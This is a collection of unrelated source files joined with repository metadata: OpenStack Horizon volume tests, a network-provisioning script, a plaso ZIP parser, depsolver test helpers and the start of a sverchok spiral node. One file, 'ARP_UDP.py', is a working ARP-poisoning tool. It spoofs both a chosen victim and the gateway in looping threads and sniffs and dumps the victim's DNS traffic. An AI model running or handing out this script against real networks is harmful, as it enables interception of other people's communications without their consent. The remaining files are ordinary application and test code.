self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['volume'].id, volume.id)
self.assertEqual(len(res.context['table'].data),
len(this_volume_snapshots))
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once()
@test.create_mocks({cinder: ['volume_get',
'message_list',
'volume_snapshot_list',
'tenant_absolute_limits']})
def test_detail_view_with_messages_tab(self):
volume = self.cinder_volumes.first()
messages = [msg for msg in self.cinder_messages.list()
if msg.resource_type == 'VOLUME']
snapshots = self.cinder_volume_snapshots.list()
self.mock_volume_get.return_value = volume
self.mock_message_list.return_value = messages
self.mock_volume_snapshot_list.return_value = snapshots
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = reverse(DETAIL_URL, args=[volume.id])
detail_view = tabs.VolumeDetailTabs(self.request)
messages_tab_link = "?%s=%s" % (
detail_view.param_name,
detail_view.get_tab("messages_tab").get_id())
url += messages_tab_link
res = self.client.get(url)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertContains(res, messages[0].user_message)
self.assertContains(res, messages[1].user_message)
self.assertNoMessages()
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts={'volume_id': volume.id})
self.mock_tenant_absolute_limits.assert_called_once_with(
test.IsHttpRequest())
search_opts = {'resource_type': 'volume',
'resource_uuid': volume.id}
self.mock_message_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=search_opts)
@mock.patch.object(cinder, 'volume_get')
def test_detail_view_with_exception(self, mock_get):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id,
"attachment_id": ATTACHMENT_ID}]
mock_get.side_effect = self.exceptions.cinder
url = reverse('horizon:project:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertRedirectsNoFollow(res, INDEX_URL)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(
test.IsHttpRequest(), volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name, volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_without_name(self):
volume = self.cinder_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': '',
'description': volume.description,
'bootable': False}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, '', volume.description)
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, False)
@test.create_mocks({cinder: ['volume_update',
'volume_set_bootable',
'volume_get']})
def test_update_volume_bootable_flag(self):
volume = self.cinder_bootable_volumes.get(name="my_volume")
self.mock_volume_get.return_value = volume
formData = {'method': 'UpdateForm',
'name': volume.name,
'description': 'update bootable flag',
'bootable': True}
url = reverse('horizon:project:volumes:update',
args=[volume.id])
res = self.client.post(url, formData)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_update.assert_called_once_with(
test.IsHttpRequest(), volume.id, volume.name,
'update bootable flag')
self.mock_volume_set_bootable.assert_called_once_with(
test.IsHttpRequest(), volume.id, True)
@mock.patch.object(api.glance, 'get_image_schemas')
@mock.patch.object(cinder, 'volume_upload_to_image')
@mock.patch.object(cinder, 'volume_get')
def test_upload_to_image(self, mock_get, mock_upload, mock_schemas_list):
volume = self.cinder_volumes.get(name='v2_volume')
loaded_resp = {'container_format': 'bare',
'disk_format': 'raw',
'id': '741fe2ac-aa2f-4cec-82a9-4994896b43fb',
'image_id': '2faa080b-dd56-4bf0-8f0a-0d4627d8f306',
'image_name': 'test',
'size': '2',
'status': 'uploading'}
form_data = {'id': volume.id,
'name': volume.name,
'image_name': 'testimage',
'force': True,
'container_format': 'bare',
'disk_format': 'raw'}
mock_schemas_list.return_value = self.image_schemas.first()
mock_get.return_value = volume
mock_upload.return_value = loaded_resp
url = reverse('horizon:project:volumes:upload_to_image',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_upload.assert_called_once_with(test.IsHttpRequest(),
form_data['id'],
form_data['force'],
form_data['image_name'],
form_data['container_format'],
form_data['disk_format'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_extend')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume(self, mock_get, mock_extend, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 120}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
mock_extend.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
mock_extend.assert_called_once_with(test.IsHttpRequest(), volume.id,
formData['new_size'])
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_wrong_size(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 10}
mock_get.return_value = volume
mock_quotas.return_value = self.cinder_quota_usages.first()
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormErrors(res, 1,
"New size must be greater than "
"current size.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once()
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'tenant_absolute_limits')
@mock.patch.object(cinder, 'volume_get')
def test_retype_volume_supported_action_item(self, mock_get,
mock_limits, mock_quotas):
volume = self.cinder_volumes.get(name='v2_volume')
limits = self.cinder_limits['absolute']
mock_get.return_value = volume
mock_limits.return_value = limits
mock_quotas.return_value = self.cinder_quota_usages.first()
url = (INDEX_URL +
"?action=row_update&table=volumes&obj_id=" + volume.id)
res = self.client.get(url, {}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
self.assertContains(res, 'Change Volume Type')
self.assertContains(res, 'retype')
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
mock_quotas.assert_called_once_with(test.IsHttpRequest(),
targets=('volumes', 'gigabytes'))
self.assert_mock_multiple_calls_with_same_arguments(
mock_limits, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({
cinder: ['volume_type_list',
'volume_retype',
'volume_get']
})
def test_retype_volume(self):
volume = self.cinder_volumes.get(name='my_volume2')
volume_type = self.cinder_volume_types.get(name='vol_type_1')
form_data = {'id': volume.id,
'name': volume.name,
'volume_type': volume_type.name,
'migration_policy': 'on-demand'}
self.mock_volume_get.return_value = volume
self.mock_volume_type_list.return_value = \
self.cinder_volume_types.list()
self.mock_volume_retype.return_value = True
url = reverse('horizon:project:volumes:retype',
args=[volume.id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redirect_url = INDEX_URL
self.assertRedirectsNoFollow(res, redirect_url)
self.mock_volume_get.assert_called_once_with(test.IsHttpRequest(),
volume.id)
self.mock_volume_type_list.assert_called_once()
self.mock_volume_retype.assert_called_once_with(
test.IsHttpRequest(), volume.id,
form_data['volume_type'], form_data['migration_policy'])
def test_encryption_false(self):
self._test_encryption(False)
def test_encryption_true(self):
self._test_encryption(True)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def _test_encryption(self, encryption):
volumes = self.cinder_volumes.list()
for volume in volumes:
volume.encrypted = encryption
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = \
self.cinder_volume_snapshots.list()
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
rows = res.context['volumes_table'].get_rows()
column_value = 'Yes' if encryption else 'No'
for row in rows:
self.assertEqual(row.cells['encryption'].data, column_value)
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(quotas, 'tenant_quota_usages')
@mock.patch.object(cinder, 'volume_get')
def test_extend_volume_with_size_out_of_quota(self, mock_get, mock_quotas):
volume = self.cinder_volumes.first()
usage_limit = self.cinder_quota_usages.first()
usage_limit.add_quota(api.base.Quota('gigabytes', 100))
usage_limit.tally('gigabytes', 20)
usage_limit.tally('volumes', len(self.cinder_volumes.list()))
formData = {'name': 'A Volume I Am Making',
'orig_size': volume.size,
'new_size': 1000}
mock_quotas.return_value = usage_limit
mock_get.return_value = volume
url = reverse('horizon:project:volumes:extend',
args=[volume.id])
res = self.client.post(url, formData)
self.assertFormError(res, "form", "new_size",
"Volume cannot be extended to 1000GiB as "
"the maximum size it can be extended to is "
"120GiB.")
mock_get.assert_called_once_with(test.IsHttpRequest(), volume.id)
self.assertEqual(2, mock_quotas.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits'],
})
def test_create_transfer_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create transfer action is present if and only if
# the volume is available
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('create_transfer' in actions,
vol.status == 'available')
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
@mock.patch.object(cinder, 'transfer_get')
@mock.patch.object(cinder, 'transfer_create')
def test_create_transfer(self, mock_transfer_create, mock_transfer_get):
volumes = self.cinder_volumes.list()
volToTransfer = [v for v in volumes if v.status == 'available'][0]
formData = {'volume_id': volToTransfer.id,
'name': 'any transfer name'}
transfer = self.cinder_volume_transfers.first()
mock_transfer_create.return_value = transfer
mock_transfer_get.return_value = transfer
# Create a transfer for the first available volume
url = reverse('horizon:project:volumes:create_transfer',
args=[volToTransfer.id])
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
mock_transfer_create.assert_called_once_with(test.IsHttpRequest(),
formData['volume_id'],
formData['name'])
mock_transfer_get.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'transfer_delete',
'tenant_absolute_limits'],
})
def test_delete_transfer(self):
transfer = self.cinder_volume_transfers.first()
volumes = []
# Attach the volume transfer to the relevant volume
for v in self.cinder_volumes.list():
if v.id == transfer.volume_id:
v.status = 'awaiting-transfer'
v.transfer = transfer
volumes.append(v)
formData = {'action':
'volumes__delete_transfer__%s' % transfer.volume_id}
self.mock_volume_backup_supported.return_value = False
self.mock_volume_list_paged.return_value = [volumes, False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
url = INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.assertIn('Successfully deleted volume transfer "test transfer"',
[m.message for m in res.context['messages']])
self.assertEqual(5, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
search_opts=None, sort_dir='desc',
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_transfer_delete.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(8, self.mock_tenant_absolute_limits.call_count)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'transfer_accept']
})
def test_accept_transfer(self):
transfer = self.cinder_volume_transfers.first()
self.mock_tenant_absolute_limits.return_value = \
self.cinder_limits['absolute']
formData = {'transfer_id': transfer.id, 'auth_key': transfer.auth_key}
url = reverse('horizon:project:volumes:accept_transfer')
res = self.client.post(url, formData, follow=True)
self.assertNoFormErrors(res)
self.mock_transfer_accept.assert_called_once_with(test.IsHttpRequest(),
transfer.id,
transfer.auth_key)
self.assertEqual(3, self.mock_tenant_absolute_limits.call_count)
self.mock_server_list.assert_called_once()
self.mock_volume_list_paged.assert_called_once()
self.mock_volume_snapshot_list.assert_called_once()
self.mock_transfer_accept.assert_called_once()
@mock.patch.object(cinder, 'transfer_get')
def test_download_transfer_credentials(self, mock_transfer):
transfer = self.cinder_volume_transfers.first()
filename = "{}.txt".format(slugify(transfer.id))
url = reverse('horizon:project:volumes:'
'download_transfer_creds',
kwargs={'transfer_id': transfer.id,
'auth_key': transfer.auth_key})
res = self.client.get(url)
self.assertTrue(res.has_header('content-disposition'))
self.assertTrue(res.has_header('content-type'))
self.assertEqual(res.get('content-disposition'),
'attachment; filename={}'.format(filename))
self.assertEqual(res.get('content-type'), 'application/text')
self.assertIn(transfer.id, res.content.decode('utf-8'))
self.assertIn(transfer.auth_key, res.content.decode('utf-8'))
mock_transfer.assert_called_once_with(test.IsHttpRequest(),
transfer.id)
@test.create_mocks({
api.nova: ['server_list'],
cinder: ['volume_backup_supported',
'volume_list_paged',
'volume_snapshot_list',
'tenant_absolute_limits',
'volume_get'],
})
def test_create_backup_availability(self):
limits = self.cinder_limits['absolute']
self.mock_volume_backup_supported.return_value = True
self.mock_volume_list_paged.return_value = [self.cinder_volumes.list(),
False, False]
self.mock_volume_snapshot_list.return_value = []
self.mock_server_list.return_value = [self.servers.list(), False]
self.mock_tenant_absolute_limits.return_value = limits
res = self.client.get(INDEX_URL)
table = res.context['volumes_table']
# Verify that the create backup action is present if and only if
# the volume is available or in-use
for vol in table.data:
actions = [a.name for a in table.get_row_actions(vol)]
self.assertEqual('backups' in actions,
vol.status in ('available', 'in-use'))
self.assertEqual(10, self.mock_volume_backup_supported.call_count)
self.mock_volume_list_paged.assert_called_once_with(
test.IsHttpRequest(), marker=None,
sort_dir='desc', search_opts=None,
paginate=True)
self.mock_volume_snapshot_list.assert_called_once_with(
test.IsHttpRequest(), search_opts=None)
self.mock_server_list.assert_called_once_with(test.IsHttpRequest(),
search_opts=None)
self.assertEqual(13, self.mock_tenant_absolute_limits.call_count)
| apache-2.0 | 5,897,069,910,118,493,000 | 44.455019 | 79 | 0.577588 | false |
efimlosev/corpcolo | noc-ps/add_server.py | 1 | 2912 | from json_p_n import sendRecieve
import pexpect,argparse
from sys import path
import subprocess
path.append('/home/efim/Dropbox')
from ipcalc_flask import calculateSubnet as calc
def Main():
parser = argparse.ArgumentParser()
parser.add_argument('subnet', help='Give me a subnet', type=str) #optinal argument
parser.add_argument('vlan', help='We need a vlan here', type=str) #the same
parser.add_argument('desc', help='We need a description here', type=str) #the same
parser.add_argument('hostname', nargs='?', help='We need a hostname here', type=str) #the same
parser.add_argument('-i', help='We need an Ip here', type=str) #the same
args = parser.parse_args()
temp = addUrl(args.subnet,args.vlan,args.desc)
temp1 = getAllinformationWeWantiToUpdate(temp,{'hostname': args.hostname},args.i)
updateHost(temp1,args.vlan,args.desc)
def addUrl(subnet,vlan,desc):
tmp = calc(subnet)
sub = str(tmp[0])
gw = str(tmp[1])
ip = str(tmp[2]).split(' - ')[0]
nm = str(tmp[3])
servername, descrend = desc.split(' ')
tmp = None
tmp = sendRecieve('addSubnet',{'subnet': sub, 'gateway': gw, 'netmask': nm, 'vlan' : vlan, 'description': desc})
print tmp['result']['success']
ipSub = { 'ip':ip, 'subnet': sub, 'descrend' : descrend, 'servername' : servername }
return ipSub
def getAllinformationWeWantiToUpdate(ipsub,hostname,ip=None):
ipsub.update(hostname)
if ip != None:
ipsub['ip'] = ip
# print ipsub
return ipsub
def updateHost(whatWeWantToUpdate,vlan,desc ):
hosts = sendRecieve("searchHosts", {'start': 0, 'limit': 100, 'query': whatWeWantToUpdate['servername'] })['result']['data']
exactHost = [ host for host in hosts if host['descr'].split('(')[0] == whatWeWantToUpdate['servername']]
#print exactHost[0]['descr']
for k,v in exactHost[0].iteritems():
if k in whatWeWantToUpdate:
exactHost[0][k] = whatWeWantToUpdate[k]
exactHost[0]['descr'] = str(exactHost[0]['descr'].split(')')[0] + ')' + whatWeWantToUpdate['descrend'])
print exactHost[0]['pool']
connection = sendRecieve("getConnectionsByHost", exactHost[0]['mac'])['result']['data']
switchName = connection[0]['devname']
switchPort = connection[0]['portdescr'].split(' ')[1].split('[')[1].split(']')[0]
devices = sendRecieve("getDevices", 0, 1000)['result']['data']
switchIp = [device['ip'] for device in devices if device['name'] == switchName ][0]
if exactHost[0]['pool'] != 16:
print 'Something went wrong, exitting!'
exit()
print sendRecieve("getConnectionsByHost", exactHost[0]['mac'])
print exactHost[0]['ip']
print sendRecieve("updateHost", exactHost[0])
subprocess.check_call(['/home/efim/Dropbox/sshs_rem.sh', switchIp, switchPort, vlan, desc])
if __name__ == '__main__':
Main()
#updateHost('710A6R22', {'descr': 'test'})
| gpl-2.0 | -1,418,926,991,163,073,500 | 40.6 | 127 | 0.650755 | false |
Dylan-halls/Network-Exploitation-Toolkit | PacketBlocker/ARP_UDP.py | 1 | 2931 | import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import threading
from termcolor import colored
os.system("clear")
print("""
____ ___________ __________
| | \______ ______ )
| | /| | \| ___)
| | / | ` \ |
|______/ /_______ /____|
\/
""")
os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
VIP = input("\nVictim: ")
GW = input("Gateway: ")
IFACE = input("Interface: ")
str(GW)
str(VIP)
str(IFACE)
def pkthandler(pkt):
try:
ip = pkt[IP]
except IndexError:
pass
try:
src = ip.src
dst = ip.dst
except UnboundLocalError:
pass
if pkt.haslayer(UDP):
udp = pkt[UDP]
print("--------------------------------------------------------\n\n")
print(" .:{}:. ".format(colored('UDP','red')))
print(" ")
print(" \033[1;36mSource IP:\033[00m {} \033[1;36mDestination IP:\033[00m {}".format(src, dst))
print(" \033[1;36mSource Port:\033[00m {} \033[1;36mDestination Port:\033[00m {}".format(udp.sport, udp.dport))
print(" \033[1;36mLength:\033[00m {} ".format(udp.len))
print(" \033[1;36mChecksum:\033[00m {} ".format(udp.chksum))
rawLoad = pkt.getlayer(Raw)
if rawLoad == None: pass
else:
print(" \033[1;36mRaw:\n\n\033[00m {} ".format(rawLoad))
print(" ")
print(" ")
hexdump(pkt)
def v_poison():
v = ARP(pdst=VIP, psrc=GW,)
while True:
try:
send(v,verbose=0,inter=1,loop=1)
except KeyboardInterupt: # Functions constructing and sending the ARP packets
sys.exit(1)
def gw_poison():
gw = ARP(pdst=GW, psrc=VIP)
while True:
try:
send(gw,verbose=0,inter=1,loop=1)
except KeyboardInterupt:
sys.exit(1)
def format_muti_lines(prefix, string, size=80):
size -= len(prefix)
if isinstance(string, bytes):
string = ''.join(r'\x{:02x}'.format(byte) for byte in string)
if size % 2:
size -= 1
return '\n'.join([prefix + line for line in textwrap.wrap(string, size)])
vthread = []
gwthread = []
while True: # Threads
vpoison = threading.Thread(target=v_poison)
vpoison.setDaemon(True)
vthread.append(vpoison)
vpoison.start()
gwpoison = threading.Thread(target=gw_poison)
gwpoison.setDaemon(True)
gwthread.append(gwpoison)
gwpoison.start()
try:
pkt = sniff(iface=str(IFACE),filter='udp port 53',prn=pkthandler)
except KeyboardInterrupt:
os.system("{ cd ..; python3 net.py; }")
exit(0)
if __name__ == "__main__":
UDP() | mit | -8,585,580,230,848,259,000 | 26.92381 | 118 | 0.493347 | false |
rgayon/plaso | plaso/parsers/czip.py | 1 | 2615 | # -*- coding: utf-8 -*-
"""This file contains a parser for compound ZIP files."""
from __future__ import unicode_literals
import struct
import zipfile
from plaso.lib import errors
from plaso.parsers import interface
from plaso.parsers import logger
from plaso.parsers import manager
class CompoundZIPParser(interface.FileObjectParser):
"""Shared functionality for parsing compound zip files.
Compound zip files are zip files used as containers to create another file
format, as opposed to archives of unrelated files.
"""
NAME = 'czip'
DATA_FORMAT = 'Compound ZIP file'
_plugin_classes = {}
def ParseFileObject(self, parser_mediator, file_object):
"""Parses a compound ZIP file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
display_name = parser_mediator.GetDisplayName()
if not zipfile.is_zipfile(file_object):
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2:s}'.format(
self.NAME, display_name, 'Not a Zip file.'))
try:
zip_file = zipfile.ZipFile(file_object, 'r', allowZip64=True)
self._ProcessZipFileWithPlugins(parser_mediator, zip_file)
zip_file.close()
# Some non-ZIP files return true for is_zipfile but will fail with a
# negative seek (IOError) or another error.
except (zipfile.BadZipfile, struct.error) as exception:
raise errors.UnableToParseFile(
'[{0:s}] unable to parse file: {1:s} with error: {2!s}'.format(
self.NAME, display_name, exception))
def _ProcessZipFileWithPlugins(self, parser_mediator, zip_file):
"""Processes a zip file using all compound zip files.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
zip_file (zipfile.ZipFile): the zip file. It should not be closed in
this method, but will be closed in ParseFileObject().
"""
archive_members = zip_file.namelist()
for plugin in self._plugins:
try:
plugin.UpdateChainAndProcess(
parser_mediator, zip_file=zip_file, archive_members=archive_members)
except errors.WrongCompoundZIPPlugin as exception:
logger.debug('[{0:s}] wrong plugin: {1!s}'.format(
self.NAME, exception))
manager.ParsersManager.RegisterParser(CompoundZIPParser)
| apache-2.0 | 3,504,794,705,852,098,000 | 33.407895 | 80 | 0.690631 | false |
enthought/depsolver | depsolver/solver/tests/scenarios/common.py | 1 | 6526 | import collections
import glob
import json
import subprocess
import tempfile
import os.path as op
import yaml
from depsolver.bundled.traitlets \
import \
HasTraits, Dict, Instance, List, Long, Unicode
from depsolver.constraints \
import \
Any, GEQ, LT
from depsolver.package \
import \
PackageInfo
from depsolver.pool \
import \
Pool
from depsolver.repository \
import \
Repository
from depsolver.request \
import \
Request
from depsolver.requirement \
import \
Requirement
from depsolver.requirement_parser \
import \
RawRequirementParser
COMMON_IMPORTS = """\
use Composer\DependencyResolver\Decisions;
use Composer\DependencyResolver\DefaultPolicy;
use Composer\DependencyResolver\Pool;
use Composer\DependencyResolver\Request;
use Composer\DependencyResolver\RuleWatchGraph;
use Composer\DependencyResolver\RuleWatchNode;
use Composer\DependencyResolver\Solver;
use Composer\DependencyResolver\Transaction;
use Composer\Json\JsonFile;
use Composer\Package\CompletePackage;
use Composer\Package\Link;
use Composer\Package\LinkConstraint\MultiConstraint;
use Composer\Package\LinkConstraint\VersionConstraint;
use Composer\Package\Loader\ArrayLoader;
use Composer\Repository\ArrayRepository;
use Composer\Repository\FilesystemRepository;
use Composer\Repository\InstalledFilesystemRepository;
use Composer\Repository\WritableArrayRepository;
"""
COMPOSER_PATH = "/Users/cournape/src/dev/composer/composer-git"
#COMPOSER_PATH = "/home/davidc/src/projects/composer-git"
P = PackageInfo.from_string
R = Requirement.from_string
def requirement_to_php_string(req):
s = str(req)
parts = (part.split() for part in s.split(","))
ret = []
for part in parts:
ret.append(" ".join(part[1:]))
return ", ".join(ret)
def requirements_to_php_dict(requirements):
php_dict = collections.defaultdict(list)
for requirement in requirements:
php_dict[requirement.name].append(requirement_to_php_string(requirement))
return dict((k, ", ".join(v)) for k, v in php_dict.items())
def packages_list_to_php_json(packages):
res = []
for package in packages:
version_normalized = str(package.version) + ".0"
res.append({
"name": package.name,
"version": str(package.version),
"version_normalized": version_normalized,
"provide": requirements_to_php_dict(package.provides),
"require": requirements_to_php_dict(package.dependencies),
"conflict": requirements_to_php_dict(package.conflicts),
"replace": requirements_to_php_dict(package.replaces),
})
return json.dumps(res, indent=4)
def requirement_string_to_php_constraints(req):
ret = []
parser = RawRequirementParser()
reqs = parser.parse(req).items()
if not len(reqs) == 1:
raise ValueError()
for name, constraints in reqs:
for constraint in constraints:
if isinstance(constraint, GEQ):
ret.append((">=", constraint.version))
elif isinstance(constraint, LT):
ret.append(("<", constraint.version))
elif isinstance(constraint, Any):
pass
else:
raise ValueError("Unsupported constraint: %s" % constraint)
return ret
def job_to_php_constraints(job):
"""
Extract requirements from a _Job instance into a comma-separated string of
php requirements.
"""
s = str(job.requirement)
constraints = ['new VersionConstraint("%s", "%s")' % \
(ret[0], ret[1]) \
for ret in requirement_string_to_php_constraints(s)]
return ',\n'.join(constraints)
class BaseScenario(HasTraits):
remote_repository = Instance(Repository)
installed_repository = Instance(Repository)
pool = Instance(Pool)
request = Instance(Request)
@classmethod
def from_yaml(cls, filename):
with open(filename, "rt") as fp:
raw_data = yaml.load(fp)
packages = [P(s) for s in raw_data.get("packages", [])]
package_name_to_package = {}
for package in packages:
package_name_to_package[package.unique_name] = package
raw_installed_packages = raw_data.get("installed_repository", []) or []
installed_packages = [package_name_to_package[package_name] \
for package_name in raw_installed_packages]
raw_remote_packages = raw_data.get("remote_repository", []) or []
remote_packages = [package_name_to_package[package_name] \
for package_name in raw_remote_packages]
request_data = [(r["operation"], r["requirement"]) \
for r in raw_data.get("request", []) or []]
return cls.from_data(remote_packages=remote_packages,
installed_packages=installed_packages,
request_jobs=request_data)
@classmethod
def from_data(cls, remote_packages, installed_packages, request_jobs):
remote_repository = Repository(packages=[P(p.package_string) for p in remote_packages])
installed_repository = Repository(packages=[P(p.package_string) for p in installed_packages])
pool = Pool([remote_repository, installed_repository])
request = Request(pool)
for name, requirement_string in request_jobs:
getattr(request, name)(R(requirement_string))
return cls(remote_repository=remote_repository,
installed_repository=installed_repository,
pool=pool, request=request)
def run_php_scenarios(data_directory, scenario_class, post_process, test_directory=None):
if test_directory is None:
test_directory = data_directory
for path in glob.glob(op.join(data_directory, "*.yaml")):
php_file = op.splitext(path)[0] + ".php"
print(path)
print(php_file)
test_file = op.splitext(op.join(test_directory, op.basename(path)))[0] + ".test"
scenario = scenario_class.from_yaml(path)
scenario.to_php(php_file, composer_location=COMPOSER_PATH)
with tempfile.NamedTemporaryFile(suffix=".php") as fp:
scenario.to_php(fp.name, composer_location=COMPOSER_PATH)
with open(test_file, "wt") as ofp:
output = subprocess.check_output(["php", fp.name])
ofp.write(post_process(output))
| bsd-3-clause | -6,149,799,869,014,685,000 | 33.167539 | 101 | 0.650781 | false |
DolphinDream/sverchok | nodes/generators_extended/spiral_mk2.py | 1 | 22191 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
from bpy.props import IntProperty, FloatProperty, BoolProperty, EnumProperty
from math import sin, cos, pi, sqrt, exp, atan, log
import re
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode, match_long_repeat, get_edge_list
from sverchok.utils.sv_easing_functions import *
from sverchok.utils.sv_transform_helper import AngleUnits, SvAngleHelper
PHI = (sqrt(5) + 1) / 2 # the golden ratio
PHIPI = 2 * log(PHI) / pi # exponent for the Fibonacci (golden) spiral
spiral_type_items = [
("ARCHIMEDEAN", "Archimedean", "Generate an archimedean spiral.", 0),
